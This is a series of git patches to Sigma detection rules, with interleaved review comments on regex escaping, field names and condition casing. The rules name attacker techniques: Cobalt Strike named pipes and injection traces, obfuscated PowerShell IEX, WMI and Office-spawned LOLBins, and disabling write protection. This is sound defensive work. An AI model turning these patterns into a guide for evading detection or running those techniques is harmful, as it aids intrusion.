attack.execution \ No newline at end of file diff --git a/rules/linux/modsecurity/modsec_mulitple_blocks.yml b/rules/linux/modsecurity/modsec_mulitple_blocks.yml index aa6461ee..f198cf4c 100644 
--- a/rules/linux/modsecurity/modsec_mulitple_blocks.yml +++ b/rules/linux/modsecurity/modsec_mulitple_blocks.yml @@ -18,3 +18,6 @@ falsepositives: - Vulnerability scanners - Frequent attacks if system faces Internet level: medium +tags: + - attack.impact + - attack.t1499 \ No newline at end of file From 143744bc128b8de17f74b7a5c50ccf4a06cb9a5a Mon Sep 17 00:00:00 2001 From: Thomas Patzke Date: Tue, 7 Sep 2021 23:38:07 +0200 Subject: [PATCH 0775/1367] Various fixes * Backslashes in regular expressions * Casing of condition operators * Further small errors --- rules/network/zeek/zeek_dns_mining_pools.yml | 8 ++-- .../zeek/zeek_dns_suspicious_zbit_flag.yml | 2 +- ...ke_obfuscation_obfuscated_iex_services.yml | 2 +- ...sysmon_suspicious_dbghelp_dbgcore_load.yml | 4 +- .../sysmon_mal_cobaltstrike_re.yml | 38 +++++++++---------- ...hell_invoke_obfuscation_obfuscated_iex.yml | 4 +- ...mon_cobaltstrike_bof_injection_pattern.yml | 4 +- .../win_detecting_fake_instances_of_hxtsr.yml | 2 +- .../win_hiding_malware_in_fonts_folder.yml | 2 +- ...obfuscation_obfuscated_iex_commandline.yml | 4 +- .../win_regedit_import_keys.yml | 2 +- .../win_regedit_import_keys_ads.yml | 2 +- rules/windows/process_creation/win_regini.yml | 2 +- .../process_creation/win_regini_ads.yml | 2 +- ...win_write_protect_for_storage_disabled.yml | 2 +- ...sing_windows_telemetry_for_persistence.yml | 2 +- 16 files changed, 41 insertions(+), 41 deletions(-) diff --git a/rules/network/zeek/zeek_dns_mining_pools.yml b/rules/network/zeek/zeek_dns_mining_pools.yml index c6d11204..7ca14a4f 100644 --- a/rules/network/zeek/zeek_dns_mining_pools.yml +++ b/rules/network/zeek/zeek_dns_mining_pools.yml @@ -7,9 +7,9 @@ date: 2021/08/19 modified: 2021/08/23 author: Saw Winn Naung, Azure-Sentinel, @neu5ron level: low -logsource: - service: dns - product: zeek +logsource: + service: dns + product: zeek tags: - attack.t1035 # an old one - attack.t1569.002 
@@ -93,7 +93,7 @@ detection: - "0.0.0.0" exclude_rejected: rejected: "true" - condition: selection and not (exclude_answers OR exclude_rejected) + condition: selection and not (exclude_answers or exclude_rejected) falsepositives: - A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is "host" and ssl/tls is "server_name". fields: diff --git a/rules/network/zeek/zeek_dns_suspicious_zbit_flag.yml b/rules/network/zeek/zeek_dns_suspicious_zbit_flag.yml index 1690856f..242a62d9 100644 --- a/rules/network/zeek/zeek_dns_suspicious_zbit_flag.yml +++ b/rules/network/zeek/zeek_dns_suspicious_zbit_flag.yml @@ -44,7 +44,7 @@ detection: - '137' - '138' - '139' - condition: NOT z_flag_unset AND most_probable_valid_domain AND NOT (exclude_tlds OR exclude_tlds OR exclude_query_types OR exclude_responses OR exclude_netbios) + condition: not z_flag_unset and most_probable_valid_domain and not (exclude_tlds or exclude_tlds or exclude_query_types or exclude_responses or exclude_netbios) falsepositives: - 'Internal or legitimate external domains using DNSSec. Verify if these are legitimate DNSSec domains and then exclude them.' - 'If you work in a Public Sector then it may be good to exclude things like endswith ".edu", ".gov" and or ".mil"' diff --git a/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml b/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml index aa3cec10..077f3e5c 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml 
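Review bot: The rewritten condition in `zeek_dns_suspicious_zbit_flag.yml` still lists `exclude_tlds` twice — `not (exclude_tlds or exclude_tlds or exclude_query_types ...)` — so either one occurrence is a leftover duplicate or a second exclusion selection was meant and is missing, which would silently narrow the exclusions. The casing fix is right, but the duplicate should be resolved in the same change, e.g. `condition: not z_flag_unset and most_probable_valid_domain and not (exclude_tlds or exclude_query_types or exclude_responses or exclude_netbios)` if no second selection exists. The `detection` block begins outside the hunk, so whether another `exclude_*` selection is defined cannot be confirmed here.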
@@ -16,7 +16,7 @@ detection: - ImagePath|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' - ImagePath|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' - ImagePath|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}' - - ImagePath|re: '\*mdr\*\W\s*\)\.Name' + - ImagePath|re: '\\*mdr\*\W\s*\)\.Name' - ImagePath|re: '\$VerbosePreference\.ToString\(' - ImagePath|re: '\String\]\s*\$VerbosePreference' condition: selection and selection_1 diff --git a/rules/windows/image_load/sysmon_suspicious_dbghelp_dbgcore_load.yml b/rules/windows/image_load/sysmon_suspicious_dbghelp_dbgcore_load.yml index 929ff8cb..68b9041f 100755 --- a/rules/windows/image_load/sysmon_suspicious_dbghelp_dbgcore_load.yml +++ b/rules/windows/image_load/sysmon_suspicious_dbghelp_dbgcore_load.yml @@ -23,7 +23,7 @@ detection: ImageLoaded|endswith: - '\dbghelp.dll' - '\dbgcore.dll' - Image|endswith: + Image|endswith: - '\msbuild.exe' - '\cmd.exe' - '\svchost.exe' @@ -53,7 +53,7 @@ detection: Signed: "FALSE" filter: Image|contains: 'Visual Studio' - condition: (signedprocess AND NOT filter) OR (unsignedprocess AND NOT filter) + condition: (signedprocess and not filter) or (unsignedprocess and not filter) fields: - ComputerName - User diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml index 1ecc14c6..cc18f34d 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml 
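Review bot: `'\\*mdr\*\W\s*\)\.Name'` escapes the first asterisk differently from the second, and the same pattern becomes `'\\\\*mdr\\\\*\W\s*\)\.Name'` in the `powershell_invoke_obfuscation_obfuscated_iex.yml` and `win_invoke_obfuscation_obfuscated_iex_commandline.yml` hunks further down, so three rules for one Invoke-Obfuscation technique now carry three different regexes. In the original `\*mdr\*` each backslash escapes an asterisk so the regex matches the literal glob `*mdr*`; once the backslash is doubled, `\\*` reads as "a literal backslash, repeated", whether or not the converter strips one escaping layer, so the pattern no longer matches the `*mdr*` text at all and this looks like a case the blanket backslash-doubling should have skipped. Keeping `'\*mdr\*\W\s*\)\.Name'` in all three rules, or whichever single form a conversion test shows to be correct for the target backends, would restore consistency.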
@@ -18,25 +18,25 @@ logsource: definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself or use this extended version that logs the Named Pipes used in this Sigma repo (https://github.com/Neo23x0/sysmon-config)' detection: selection: - - PipeName|re: '\\mojo\.5688\.8052\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' - - PipeName|re: '\\wkssvc_?[0-9a-f]{2}' - - PipeName|re: '\\ntsvcs[0-9a-f]{2}' - - PipeName|re: '\\DserNamePipe[0-9a-f]{2}' - - PipeName|re: '\\SearchTextHarvester[0-9a-f]{2}' - - PipeName|re: '\\mypipe\-(?:f|h)[0-9a-f]{2}' - - PipeName|re: '\\windows\.update\.manager[0-9a-f]{2,3}' - - PipeName|re: '\\ntsvcs_[0-9a-f]{2}' - - PipeName|re: '\\scerpc_?[0-9a-f]{2}' - - PipeName|re: '\\PGMessagePipe[0-9a-f]{2}' - - PipeName|re: '\\MsFteWds[0-9a-f]{2}' - - PipeName|re: '\\f4c3[0-9a-f]{2}' - - PipeName|re: '\\fullduplex_[0-9a-f]{2}' - - PipeName|re: '\\msrpc_[0-9a-f]{4}' - - PipeName|re: '\\win\\msrpc_[0-9a-f]{2}' - - PipeName|re: '\\f53f[0-9a-f]{2}' - - PipeName|re: '\\rpc_[0-9a-f]{2}' - - PipeName|re: '\\spoolss_[0-9a-f]{2}' - - PipeName|re: '\\Winsock2\\CatalogChangeListener-[0-9a-f]{3}-0,' + - PipeName|re: '\\\\mojo\.5688\.8052\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' + - PipeName|re: '\\\\wkssvc_?[0-9a-f]{2}' + - PipeName|re: '\\\\ntsvcs[0-9a-f]{2}' + - PipeName|re: '\\\\DserNamePipe[0-9a-f]{2}' + - PipeName|re: '\\\\SearchTextHarvester[0-9a-f]{2}' + - PipeName|re: '\\\\mypipe\-(?:f|h)[0-9a-f]{2}' + - PipeName|re: '\\\\windows\.update\.manager[0-9a-f]{2,3}' + - PipeName|re: '\\\\ntsvcs_[0-9a-f]{2}' + - PipeName|re: '\\\\scerpc_?[0-9a-f]{2}' + - PipeName|re: '\\\\PGMessagePipe[0-9a-f]{2}' + - PipeName|re: '\\\\MsFteWds[0-9a-f]{2}' + - PipeName|re: '\\\\f4c3[0-9a-f]{2}' + - PipeName|re: '\\\\fullduplex_[0-9a-f]{2}' + - PipeName|re: 
'\\\\msrpc_[0-9a-f]{4}' + - PipeName|re: '\\\\win\\\\msrpc_[0-9a-f]{2}' + - PipeName|re: '\\\\f53f[0-9a-f]{2}' + - PipeName|re: '\\\\rpc_[0-9a-f]{2}' + - PipeName|re: '\\\\spoolss_[0-9a-f]{2}' + - PipeName|re: '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,' condition: selection falsepositives: - Unknown diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml b/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml index 9b030a97..94164d37 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml @@ -23,7 +23,7 @@ detection: - ScriptBlockText|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' - ScriptBlockText|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' - ScriptBlockText|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}' - - ScriptBlockText|re: '\*mdr\*\W\s*\)\.Name' + - ScriptBlockText|re: '\\\\*mdr\\\\*\W\s*\)\.Name' - ScriptBlockText|re: '\$VerbosePreference\.ToString\(' - ScriptBlockText|re: '\String\]\s*\$VerbosePreference' selection_3: @@ -33,7 +33,7 @@ detection: - Payload|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' - Payload|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' - Payload|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}' - - Payload|re: '\*mdr\*\W\s*\)\.Name' + - Payload|re: '\\\\*mdr\\\\*\W\s*\)\.Name' - Payload|re: '\$VerbosePreference\.ToString\(' - Payload|re: '\String\]\s*\$VerbosePreference' condition: ( selection_1 and selection_2 ) or ( selection_3 and selection_4 ) diff --git a/rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml b/rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml index de11db2d..7e59e4fb 100644 --- a/rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml +++ b/rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml 
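Review bot: Every pipe-name pattern now starts with `\\\\` instead of `\\`, which only matches Sysmon's single-backslash pipe names if the backend strips one layer of backslash escaping before compiling the `re` value; if it passes the value through as-is, which is how the original `\\mojo` reads, each pattern now demands two consecutive backslashes and the rule stops firing silently. The commit message does not say which backend behaviour motivated the doubling, so a converted-query check against a known pipe name per supported backend should accompany it, and a comment in the rule such as `# backslashes are doubled because the converter unescapes the regex value once` would keep the next maintainer from reverting it. The escaped dots (`\.`) were left untouched here, unlike in the BOF injection rule later in this commit.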
@@ -1,5 +1,5 @@ title: CobaltStrike BOF Injection Pattern -id: 09706624-b7f6-455d-9d02-adee024cee1d +id: 09706624-b7f6-455d-9d02-adee024cee1d description: Detects a typical pattern of a CobaltStrike BOF which inject into other processes references: - https://github.com/boku7/injectAmsiBypass @@ -12,7 +12,7 @@ logsource: product: windows detection: selection: - CallTrace|re: '^C:\\Windows\\SYSTEM32\\ntdll\.dll\+[a-z0-9]{4,6}\|C:\\Windows\\System32\\KERNELBASE\.dll\+[a-z0-9]{4,6}\|UNKNOWN\([A-Z0-9]{16}\)$' + CallTrace|re: '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\+[a-z0-9]{4,6}\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\+[a-z0-9]{4,6}\|UNKNOWN\([A-Z0-9]{16}\)$' GrantedAccess: - '0x1028' - '0x1fffff' diff --git a/rules/windows/process_creation/win_detecting_fake_instances_of_hxtsr.yml b/rules/windows/process_creation/win_detecting_fake_instances_of_hxtsr.yml index 1b381614..d5135615 100644 --- a/rules/windows/process_creation/win_detecting_fake_instances_of_hxtsr.yml +++ b/rules/windows/process_creation/win_detecting_fake_instances_of_hxtsr.yml @@ -15,7 +15,7 @@ detection: selection: Image: hxtsr.exe filter: - CurrentDirectory|re: '(?i)c:\\program files\\windowsapps\\microsoft\.windowscommunicationsapps_.*\\hxtsr\.exe' + CurrentDirectory|re: '(?i)c:\\\\program files\\\\windowsapps\\\\microsoft\.windowscommunicationsapps_.*\\\\hxtsr\.exe' condition: selection and not filter falsepositives: - unknown diff --git a/rules/windows/process_creation/win_hiding_malware_in_fonts_folder.yml b/rules/windows/process_creation/win_hiding_malware_in_fonts_folder.yml index 6bc345d0..4c44ae87 100644 --- a/rules/windows/process_creation/win_hiding_malware_in_fonts_folder.yml +++ b/rules/windows/process_creation/win_hiding_malware_in_fonts_folder.yml 
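Review bot: In the new `CallTrace|re` value the file-name dots were rewritten from `\.dll` to `\\.dll` (`ntdll\\.dll`, `KERNELBASE\\.dll`), which under a pass-through reading turns an escaped dot into "a literal backslash followed by any character", so `ntdll.dll` in a call trace would no longer match; every other rule in this commit (`hxtsr\.exe` in the next hunk, `mojo\.5688` above) kept `\.` and only doubled the path separators. For consistency the line should be `CallTrace|re: '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\.dll\+[a-z0-9]{4,6}\|C:\\\\Windows\\\\System32\\\\KERNELBASE\.dll\+[a-z0-9]{4,6}\|UNKNOWN\([A-Z0-9]{16}\)$'`. The `id:` change in the first hunk is whitespace-only.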
@@ -17,7 +17,7 @@ logsource: category: process_creation detection: selection1: - CommandLine|re: '(?i).*(echo|copy|type|file createnew|cacls).*C:\\Windows\\Fonts\\.*(.sh|.exe|.dll|.bin|.bat|.cmd|.js|.msh|.reg|.scr|.ps|.vb|.jar|.pl|.inf|.cpl|.hta|.msi|.vbs).*' + CommandLine|re: '(?i).*(echo|copy|type|file createnew|cacls).*C:\\\\Windows\\\\Fonts\\\\.*(.sh|.exe|.dll|.bin|.bat|.cmd|.js|.msh|.reg|.scr|.ps|.vb|.jar|.pl|.inf|.cpl|.hta|.msi|.vbs).*' condition: selection1 fields: - CommandLine diff --git a/rules/windows/process_creation/win_invoke_obfuscation_obfuscated_iex_commandline.yml b/rules/windows/process_creation/win_invoke_obfuscation_obfuscated_iex_commandline.yml index cd1a98ae..67ef5719 100644 --- a/rules/windows/process_creation/win_invoke_obfuscation_obfuscated_iex_commandline.yml +++ b/rules/windows/process_creation/win_invoke_obfuscation_obfuscated_iex_commandline.yml @@ -20,9 +20,9 @@ detection: - CommandLine|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' - CommandLine|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' - CommandLine|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}' - - CommandLine|re: '\*mdr\*\W\s*\)\.Name' + - CommandLine|re: '\\\\*mdr\\\\*\W\s*\)\.Name' - CommandLine|re: '\$VerbosePreference\.ToString\(' - - CommandLine|re: '\String\]\s*\$VerbosePreference' + - CommandLine|re: '\\\\String\]\s*\$VerbosePreference' condition: selection falsepositives: - Unknown diff --git a/rules/windows/process_creation/win_regedit_import_keys.yml b/rules/windows/process_creation/win_regedit_import_keys.yml index 176da7f7..ff27028a 100644 --- a/rules/windows/process_creation/win_regedit_import_keys.yml +++ b/rules/windows/process_creation/win_regedit_import_keys.yml @@ -25,7 +25,7 @@ detection: - ' /a ' - ' /c ' filter_2: - CommandLine|re: ':[^ \\]' # to avoid intersection with ADS rule + CommandLine|re: ':[^ \\\\]' # to avoid intersection with ADS rule condition: selection and not filter and not filter_2 fields: - ParentImage 
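Review bot: `'\\\\String\]\s*\$VerbosePreference'` in the commandline rule turns the leading `\S` of the original `\String\]` (a non-whitespace class, so it matched any character plus `tring]`) into literal backslashes, and neither form says what the rule is after — the obfuscated IEX launcher this targets presumably uses the `[String]` type accelerator, so the intended pattern is probably `'\[String\]\s*\$VerbosePreference'`. The services and PowerShell variants of this rule keep `\String\]`, so the three again diverge. Fixing all three to `\[String\]` would make the pattern match what it is documented to detect and keep the variants identical.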
diff --git a/rules/windows/process_creation/win_regedit_import_keys_ads.yml b/rules/windows/process_creation/win_regedit_import_keys_ads.yml index 2d347763..30fac38c 100644 --- a/rules/windows/process_creation/win_regedit_import_keys_ads.yml +++ b/rules/windows/process_creation/win_regedit_import_keys_ads.yml @@ -20,7 +20,7 @@ detection: - ' /i ' - '.reg' selection_2: - CommandLine|re: ':[^ \\]' + CommandLine|re: ':[^ \\\\]' filter: CommandLine|contains: - ' /e ' diff --git a/rules/windows/process_creation/win_regini.yml b/rules/windows/process_creation/win_regini.yml index 3f1a340c..3c85a778 100644 --- a/rules/windows/process_creation/win_regini.yml +++ b/rules/windows/process_creation/win_regini.yml @@ -19,7 +19,7 @@ detection: selection: Image|endswith: '\regini.exe' filter: - CommandLine|re: ':[^ \\]' # to avoid intersection with ADS rule + CommandLine|re: ':[^ \\\\]' # to avoid intersection with ADS rule condition: selection and not filter fields: - ParentImage diff --git a/rules/windows/process_creation/win_regini_ads.yml b/rules/windows/process_creation/win_regini_ads.yml index 9844421c..3673e52b 100644 --- a/rules/windows/process_creation/win_regini_ads.yml +++ b/rules/windows/process_creation/win_regini_ads.yml @@ -18,7 +18,7 @@ logsource: detection: selection: Image|endswith: '\regini.exe' - CommandLine|re: ':[^ \\]' + CommandLine|re: ':[^ \\\\]' condition: selection fields: - ParentImage diff --git a/rules/windows/process_creation/win_write_protect_for_storage_disabled.yml b/rules/windows/process_creation/win_write_protect_for_storage_disabled.yml index 4462da4e..68cbe07d 100644 --- a/rules/windows/process_creation/win_write_protect_for_storage_disabled.yml +++ b/rules/windows/process_creation/win_write_protect_for_storage_disabled.yml 
@@ -13,7 +13,7 @@ logsource: category: process_creation detection: selection: - CommandLine|re: '(?i).*reg add.*hklm\\system\\currentcontrolset\\control.*(storage|storagedevicepolicies).*write protection.*0.*' + CommandLine|re: '(?i).*reg add.*hklm\\\\system\\\\currentcontrolset\\\\control.*(storage|storagedevicepolicies).*write protection.*0.*' condition: selection falsepositives: - none observed diff --git a/rules/windows/sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml b/rules/windows/sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml index 48ba2bf0..470b8f10 100644 --- a/rules/windows/sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml +++ b/rules/windows/sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml @@ -38,5 +38,5 @@ logsource: category: process_creation detection: selection: - CommandLine|re: '(?i).*schtasks.*(-|\/)r.*\\Application Experience\\Microsoft Compatibility Appraiser.*' + CommandLine|re: '(?i).*schtasks.*(-|\/)r.*\\\\Application Experience\\\\Microsoft Compatibility Appraiser.*' condition: selection \ No newline at end of file From f0f3ecfe2f1225f18050dc905e22bb9d2fd5c001 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 7 Sep 2021 21:00:35 -0600 Subject: [PATCH 0776/1367] Converted to LF Removed : unnecessary event ID --- ...cess_creations_with_Wmiprvse_parent_process.yml | 14 +++++--------- 1 file changed, 5 insertions(+), 9 deletions(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index f567b8d6..1301950c 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml 
@@ -11,27 +11,23 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/23/8 +Date: 2021/08/23 logsource: product: Windows - service: security category: process_creation detection: #useful_information: add more LOLBins to the rules logic of your choice. selection1: - EventLog: security - EventID: 4688 - selection2: - NewProcessName|endswith: + Image|endswith: - 'regsvr32' - 'rundll32' - 'msiexec' - 'mshta' - 'verclsid' - selection3: - ParentProcessName|endswith: + selection2: + ParentImage|endswith: - "\\wbem\\WmiPrvSE.exe" - condition: selection1 AND selection2 AND selection3 + condition: selection1 AND selection2 falsepositives: - Unknown level: high From 8467d5a65ae656978d6392f9ebda9604c7e4be29 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 7 Sep 2021 21:09:07 -0600 Subject: [PATCH 0777/1367] Modified Rule Removed : unnecessary event ID --- ...m_proxy executing_regsvr32_with_payload.yml | 18 +++++++----------- 1 file changed, 7 insertions(+), 11 deletions(-) diff --git a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml index f4797751..0a3bd7cc 100644 --- a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml +++ b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml 
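Review bot: `Image|endswith:` with `'regsvr32'`, `'rundll32'`, `'msiexec'`, `'mshta'`, `'verclsid'` never matches, because `Image` holds the full path including the extension and `endswith` is anchored at the end of the string; the previous `NewProcessName|endswith` had the same flaw, but the rename is the moment to fix it. The values should carry the extension and a leading separator, e.g. `- '\regsvr32.exe'`, as the `ParentImage|endswith: "\\wbem\\WmiPrvSE.exe"` line below already does, otherwise the `.exe` variant and names like `notregsvr32` are handled inconsistently. On the new side, `Date:` should be the lowercase `date:` key, and `condition: selection1 AND selection2` keeps the upper-case operators that the preceding commit in this series normalised to `and`; the context line `product: Windows` would also read `windows` to match the other rules.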
@@ -11,37 +11,33 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/23/8 +Date: 2021/08/23 logsource: product: Windows - service: security category: process_creation detection: #useful_information: add more LOLBins to the rules logic of your choice. selection1: - EventLog: security - EventID: 4688 - selection2: ProcessCommandLine: - '*regsvr32*' - '*rundll32*' - '*msiexec*' - '*mshta*' - '*verclsid*' - selection3: - - ProcessName: '*\wbem\WMIC.exe' + selection2: + - Image: '*\wbem\WMIC.exe' - ProcessCommandLine: '*wmic *' - selection4: - ParentProcessName|endswith: + selection3: + ParentImage|endswith: - winword.exe - excel.exe - powerpnt.exe - selection5: + selection4: processCommandLine|contains|all: - 'process' - 'create' - 'call' - condition: selection1 AND selection2 AND selection3 AND selection4 AND selection5 + condition: selection1 AND selection2 AND selection3 AND selection4 falsepositives: - Unknown level: high From 3b2ebe1580e639013baa2a87b222a2851fb2d553 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 7 Sep 2021 21:12:02 -0600 Subject: [PATCH 0778/1367] Completed changes Removed : unnecessary event ID --- ...ice_Applications_Spawning_WMI_command-line.yml | 15 +++++---------- 1 file changed, 5 insertions(+), 10 deletions(-) diff --git a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml index 57d0d164..2f5a5971 100644 --- a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml 
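Review bot: The rename to `Image`/`ParentImage` is only half of the move to the process_creation field set — `ProcessCommandLine` (and `processCommandLine|contains|all` with a different casing under the new `selection4:`) are Security 4688 names, and the generic process_creation field is `CommandLine`, so after this commit two of the four selections still refer to a field the log source does not carry. The same `ProcessCommandLine: '*wmic *'` survives in the next commit's `Monitor_Office_Applications_Spawning_WMI_command-line.yml` hunk. Renaming both to `CommandLine` (the last one as `CommandLine|contains|all:`) completes the change; `Date:` should also become `date:` and the `AND`s lowercase `and`, as the earlier commit in this series did for the rest of the repository.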
@@ -11,26 +11,21 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/23/8 +Date: 2021/08/23 logsource: product: windows - service: security category: process_creation detection: #useful_information: Add more office applications to the rule logic of choice selection1: - - EventLog: security - selection2: - - EventID: 4688 - selection3: - - ProcessName: '*\wbem\WMIC.exe' + - Image: '*\wbem\WMIC.exe' - ProcessCommandLine: '*wmic *' - selection4: - - ParentProcessName: + selection2: + - ParentImage: - winword.exe - excel.exe - powerpnt.exe - condition: selection1 AND selection2 AND selection3 AND selection4 + condition: selection1 AND selection2 falsepositives: - Unknown level: high From 75a6e5c95b57fd3a669309549173b16d072ef64d Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 7 Sep 2021 21:14:06 -0600 Subject: [PATCH 0779/1367] Completed Changes as per comments Removed : unnecessary event ID --- ..._Process Create_command_execution_by_Office_Applications.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml index 4e96dc74..5f9e1589 100644 --- a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml +++ b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml @@ -11,7 +11,7 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/23/8 +Date: 2021/08/23 logsource: product: EndPoint Detection Logs category: process_creation From bd4d21c41c093294b3225b5108b5af8589de4c85 Mon Sep 17 00:00:00 2001 
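Review bot: In `Monitor_Office_Applications_Spawning_WMI_command-line.yml` the renamed selection2 uses plain `ParentImage:` with bare `winword.exe`/`excel.exe`/`powerpnt.exe`, which is an exact match against the full parent path and will not fire; the sibling rules in this series use `ParentImage|endswith:`. Change it to `- ParentImage|endswith:` with `\winword.exe`, `\excel.exe`, `\powerpnt.exe`. Selection1 keeps `ProcessCommandLine` rather than the Sigma `CommandLine` field, as in the regsvr32 rule of the previous patch.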
From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 7 Sep 2021 21:17:12 -0600 Subject: [PATCH 0780/1367] Completed changes based on comments Removed : unnecessary event ID --- ..._creation_by_Office_applications_using_file_extentions.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 6a568b55..dcfc0694 100644 --- a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -11,10 +11,9 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/23/8 +Date: 2021/08/23 logsource: product: Windows - service: Sysmon category: process_creation detection: #useful_information: Please add more file extentions and magic bytes to the logic of your choice. @@ -22,7 +21,6 @@ detection: EventType: - FileCreate - FileRename - EventID: 11 selection2: Image|endswith: - 'winword.exe' From 8dc1b03fef3f481d2497ae4ec64b566a97078afa Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 7 Sep 2021 21:19:43 -0600 Subject: [PATCH 0781/1367] Completed Changes Based on Comments Removed : unnecessary event ID --- ...r_LOLBins_Process_Creations_by_Office_applications.yml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index bf8dbf9f..896585ff 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml 
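Review bot: With `service: Sysmon` and `EventID: 11` removed, this file-creation rule (`EventType: FileCreate`/`FileRename`, plus `TargetFileName` as seen in its sysmon copy) is still declared `category: process_creation`, so backends will route it to process-creation logs where those fields do not exist; it should be `category: file_event`. The sysmon copy in PATCH 0784 has the same mismatch, and a later commit in this series (PATCH 0795) switches that copy to `file_event`, but this process_creation copy is not changed. Both hunks cut the rule below its header, so `title`/`id` are outside the hunk.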
